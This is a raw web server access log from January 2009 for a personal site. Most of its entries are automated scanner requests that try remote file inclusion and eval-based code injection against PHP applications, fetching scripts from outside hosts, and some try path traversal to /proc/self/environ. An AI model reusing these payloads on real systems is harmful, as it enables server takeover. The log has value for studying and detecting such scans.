66.11.230.7 - - [06/Jan/2009:08:00:07 -0800] "GET /logs//apboard/add.php?APB_rp=http://www.jiaoshi.com.cn/status/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.11.230.7 - - [06/Jan/2009:08:00:07 -0800] "GET /logs/access_081212.log//apboard/add.php?APB_rp=http://www.jiaoshi.com.cn/status/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.11.230.7 - - [06/Jan/2009:08:00:07 -0800] "GET /logs/access_090103.log//apboard/add.php?APB_rp=http://www.jiaoshi.com.cn/status/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.11.230.7 - - [06/Jan/2009:08:00:07 -0800] "GET /apboard/add.php?APB_rp=http://www.jiaoshi.com.cn/status/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.234.200.132 - - [06/Jan/2009:08:00:10 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
200.234.200.132 - - [06/Jan/2009:08:00:11 -0800] "GET /logs/access_081103.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
200.234.200.132 - - [06/Jan/2009:08:00:11 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
12.53.219.68 - - [06/Jan/2009:08:00:25 -0800] "GET /logs/access_090103.log//apboard/add.php?APB_rp=http://www.jiaoshi.com.cn/status/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
12.53.219.68 - - [06/Jan/2009:08:00:25 -0800] "GET /logs/access_081212.log//apboard/add.php?APB_rp=http://www.jiaoshi.com.cn/status/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.234.200.132 - - [06/Jan/2009:08:00:58 -0800] "GET /logs/access_080905.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
62.101.68.240 - - [06/Jan/2009:08:01:02 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://user666.fileave.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.101.68.240 - - [06/Jan/2009:08:01:03 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://user666.fileave.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.80.194.51 - - [06/Jan/2009:08:01:20 -0800] "GET / HTTP/1.0" 200 94196 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; acc=jocker; acc=none; (none))" "dmulk.com"
66.7.194.31 - - [06/Jan/2009:08:01:47 -0800] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.7.194.31 - - [06/Jan/2009:08:01:48 -0800] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.7.194.31 - - [06/Jan/2009:08:01:56 -0800] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.7.194.31 - - [06/Jan/2009:08:01:57 -0800] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.7.194.31 - - [06/Jan/2009:08:01:59 -0800] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.7.194.31 - - [06/Jan/2009:08:02:00 -0800] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.229.60.50 - - [06/Jan/2009:08:02:06 -0800] "GET /logs/avatar.php?page=http://rappelz.pzcci.org//media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
213.229.60.50 - - [06/Jan/2009:08:02:07 -0800] "GET /avatar.php?page=http://rappelz.pzcci.org//media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
200.234.200.132 - - [06/Jan/2009:08:02:12 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
200.234.200.132 - - [06/Jan/2009:08:02:12 -0800] "GET /logs/access_081103.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
200.234.200.132 - - [06/Jan/2009:08:02:12 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
85.214.79.241 - - [06/Jan/2009:08:02:13 -0800] "GET /logs/access_080903.log%20%20/errors.php?error=http://demod.net/test/data/abcd/iblissnet/tux/gore/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.79.241 - - [06/Jan/2009:08:02:13 -0800] "GET /errors.php?error=http://demod.net/test/data/abcd/iblissnet/tux/gore/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.79.241 - - [06/Jan/2009:08:02:13 -0800] "GET /logs/errors.php?error=http://demod.net/test/data/abcd/iblissnet/tux/gore/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.51.146 - - [06/Jan/2009:08:02:22 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.giovaniemissione.it/media/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.51.146 - - [06/Jan/2009:08:02:22 -0800] "GET /logs/access_080905.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.giovaniemissione.it/media/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.222.131.35 - - [06/Jan/2009:08:02:23 -0800] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://siam2.com/ict/news/photo/.photo/cmdstring.swf? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.198.92.34 - - [06/Jan/2009:08:02:24 -0800] "GET /logs/access_081103.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://spotlyrics.com/db/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.198.92.34 - - [06/Jan/2009:08:02:24 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://spotlyrics.com/db/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.11.230.7 - - [06/Jan/2009:08:02:26 -0800] "GET /logs/access_081212.log%20//apboard/add.php?APB_rp=http://www.jiaoshi.com.cn/status/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.11.230.7 - - [06/Jan/2009:08:02:26 -0800] "GET /logs/access_090103.log%20//apboard/add.php?APB_rp=http://www.jiaoshi.com.cn/status/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.214.51.146 - - [06/Jan/2009:08:02:45 -0800] "GET /logs/access_080928.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.giovaniemissione.it/media/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.51.146 - - [06/Jan/2009:08:02:46 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.giovaniemissione.it/media/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.51.146 - - [06/Jan/2009:08:02:46 -0800] "GET /logs/access_080905.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.giovaniemissione.it/media/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.234.200.132 - - [06/Jan/2009:08:02:47 -0800] "GET /logs/access_080905.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
85.214.79.241 - - [06/Jan/2009:08:02:54 -0800] "GET /logs/access_080723.log%20%20/errors.php?error=http://demod.net/test/data/abcd/iblissnet/tux/gore/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.30.81.169 - - [06/Jan/2009:08:03:01 -0800] "GET /logs/access_080208.log HTTP/1.0" 200 1325284 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.214.51.146 - - [06/Jan/2009:08:03:07 -0800] "GET /logs/access_080928.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.giovaniemissione.it/media/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.229.60.50 - - [06/Jan/2009:08:03:09 -0800] "GET /logs/lib/gore.php?libpath=http://rappelz.pzcci.org//media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
77.222.131.35 - - [06/Jan/2009:08:03:09 -0800] "GET /logs/access_080216.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://siam2.com/ict/news/photo/.photo/cmdstring.swf? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.229.60.50 - - [06/Jan/2009:08:03:09 -0800] "GET /lib/gore.php?libpath=http://rappelz.pzcci.org//media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
194.149.234.21 - - [06/Jan/2009:08:03:15 -0800] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.16 - - [06/Jan/2009:08:04:22 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.leegolf.com/vboard/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.230.142.4 - - [06/Jan/2009:08:04:37 -0800] "GET /logs/access_080430.log//?path%5Bdocroot%5D=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
203.230.142.4 - - [06/Jan/2009:08:04:38 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 200 81177 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
203.230.142.4 - - [06/Jan/2009:08:04:39 -0800] "GET /?path%5Bdocroot%5D=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 200 94726 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:08:04:58 -0800] "GET /logs/access_080513.log//mwchat/libs/errors.php?error=http://www.getef.com.br/inc/mraneti.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:08:04:58 -0800] "GET /mwchat/libs/errors.php?error=http://www.getef.com.br/inc/mraneti.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
203.230.142.4 - - [06/Jan/2009:08:05:08 -0800] "GET /logs/access_080304.log//?path%5Bdocroot%5D=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
79.148.238.69 - - [06/Jan/2009:08:05:49 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rappelz.pzcci.org//media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.51.146 - - [06/Jan/2009:08:05:57 -0800] "GET /logs/access_080905.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.giovaniemissione.it/media/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.51.146 - - [06/Jan/2009:08:05:57 -0800] "GET /logs/access_080928.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.giovaniemissione.it/media/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.249.70.41 - - [06/Jan/2009:08:06:02 -0800] "GET /blog/index.php/2008/08/28/?show=gallery HTTP/1.1" 200 17944 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
72.30.81.169 - - [06/Jan/2009:08:06:02 -0800] "GET /bikes/dteel/2008_09_21/?D=A HTTP/1.0" 200 1116 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:08:06:03 -0800] "GET /logs/access_080425.log//mwchat/libs/errors.php?error=http://www.getef.com.br/inc/mraneti.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
194.149.234.21 - - [06/Jan/2009:08:06:05 -0800] "GET /logs/access_080106.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.67.19.122 - - [06/Jan/2009:08:06:11 -0800] "GET /logs/access_081114.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.19.122 - - [06/Jan/2009:08:06:12 -0800] "GET /logs/access_071215.log/skin/zero_vote/error.php?dir=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.19.122 - - [06/Jan/2009:08:06:12 -0800] "GET /skin/zero_vote/error.php?dir=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.19.122 - - [06/Jan/2009:08:06:12 -0800] "GET /logs/skin/zero_vote/error.php?dir=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.199.205.47 - - [06/Jan/2009:08:06:49 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.caverna.kit.net/z1.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
200.199.205.47 - - [06/Jan/2009:08:06:49 -0800] "GET /logs/access_081103.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.caverna.kit.net/z1.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
200.199.205.47 - - [06/Jan/2009:08:06:49 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.caverna.kit.net/z1.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
203.230.142.4 - - [06/Jan/2009:08:07:29 -0800] "GET /logs/access_080420.log//?path%5Bdocroot%5D=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
85.214.51.146 - - [06/Jan/2009:08:07:49 -0800] "GET /logs/access_080905.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.giovaniemissione.it/media/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.148.238.69 - - [06/Jan/2009:08:07:51 -0800] "GET /logs/SQuery/lib/gore.php?libpath=http://rappelz.pzcci.org//media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.148.238.69 - - [06/Jan/2009:08:07:51 -0800] "GET /SQuery/lib/gore.php?libpath=http://rappelz.pzcci.org//media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.148.238.69 - - [06/Jan/2009:08:07:54 -0800] "GET /logs/SQuery/lib/gore.php?libpath=http://rappelz.pzcci.org//media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.148.238.69 - - [06/Jan/2009:08:07:55 -0800] "GET /SQuery/lib/gore.php?libpath=http://rappelz.pzcci.org//media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.51.146 - - [06/Jan/2009:08:08:04 -0800] "GET /logs/access_080928.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.giovaniemissione.it/media/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
132.247.8.18 - - [06/Jan/2009:08:08:18 -0800] "GET /logs/access_081125.log//classifieds/posts/ads/events/images/buy/sell/trade/real_estate/apartments/personals/dating/socialnetworking.php?=http://prwa-ct.org/calendar_events//tools/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.204.130 - - [06/Jan/2009:08:08:26 -0800] "GET /logs/access_080317.log/index.php?sit=http://www.vijayawadakanakadurga.com//language/idv6.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.40.204.130 - - [06/Jan/2009:08:08:26 -0800] "GET /logs/index.php?sit=http://www.vijayawadakanakadurga.com//language/idv6.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.40.204.130 - - [06/Jan/2009:08:08:27 -0800] "GET /index.php?sit=http://www.vijayawadakanakadurga.com//language/idv6.txt??%0D?? HTTP/1.1" 200 94922 "-" "libwww-perl/5.812" "www.dmulk.com"
132.247.8.18 - - [06/Jan/2009:08:08:28 -0800] "GET /logs/access_081201.log//classifieds/posts/ads/events/images/buy/sell/trade/real_estate/apartments/personals/dating/socialnetworking.php?=http://prwa-ct.org/calendar_events//tools/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.16 - - [06/Jan/2009:08:08:32 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://gugakedu.co.kr/kboard//aid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:08:09:05 -0800] "GET /logs/access_071214.log//?_zb_path=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:08:09:05 -0800] "GET /logs//?_zb_path=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 200 81177 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:08:09:06 -0800] "GET /?_zb_path=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 200 94703 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:08:09:10 -0800] "GET /logs/access_080401.log//?_zb_path=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
200.199.205.47 - - [06/Jan/2009:08:09:19 -0800] "GET /logs/access_080905.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.caverna.kit.net/z1.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
211.115.127.68 - - [06/Jan/2009:08:09:21 -0800] "GET /logs/access_081207.log//modules/My_eGallery/public/displayCategory.php?basepath=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
211.115.127.68 - - [06/Jan/2009:08:09:22 -0800] "GET /logs/access_081207.log/errors.php?error=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
211.115.127.68 - - [06/Jan/2009:08:09:22 -0800] "GET /logs/access_081207.log//modules/My_eGallery/public/displayCategory.php?basepath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
211.115.127.68 - - [06/Jan/2009:08:09:22 -0800] "GET /logs/access_081207.log//modules/My_eGallery/public/displayCategory.php?basepath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
211.115.127.68 - - [06/Jan/2009:08:09:24 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
211.115.127.68 - - [06/Jan/2009:08:09:24 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
211.115.127.68 - - [06/Jan/2009:08:09:24 -0800] "GET /logs/errors.php?error=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
211.115.127.68 - - [06/Jan/2009:08:09:24 -0800] "GET /errors.php?error=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
211.115.127.68 - - [06/Jan/2009:08:09:24 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
211.115.127.68 - - [06/Jan/2009:08:09:25 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
211.115.127.68 - - [06/Jan/2009:08:09:28 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
211.115.127.68 - - [06/Jan/2009:08:09:28 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
85.214.79.241 - - [06/Jan/2009:08:09:52 -0800] "GET /logs/access_080903.log/errors.php?error=http://demod.net/test/data/abcd/iblissnet/tux/gore/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
